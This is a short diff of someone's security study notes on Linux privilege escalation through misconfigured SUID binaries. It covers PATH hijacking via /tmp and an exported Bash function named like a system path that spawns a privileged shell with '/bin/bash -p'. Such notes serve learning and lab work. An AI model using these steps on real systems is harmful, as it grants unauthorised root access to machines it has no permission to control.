shatternox/cyber-stuff/notes.md

 3. chmod +x [the misconfigured]
 4. export PATH=/tmp:$PATH
 5. Execute the misconfigured binary

+# In Bash versions <4.2-048 it is possible to define shell functions with names that resemble file paths, then export those functions so that they are used instead of any actual executable at that file path.
+/usr/bin/cat >>> can
+1. function /usr/sbin/service { /bin/bash -p; }
+2. export -f /usr/sbin/service
+3. Execute the misconfigured binary

 ### Does not have to be in /tmp, u can create your own folder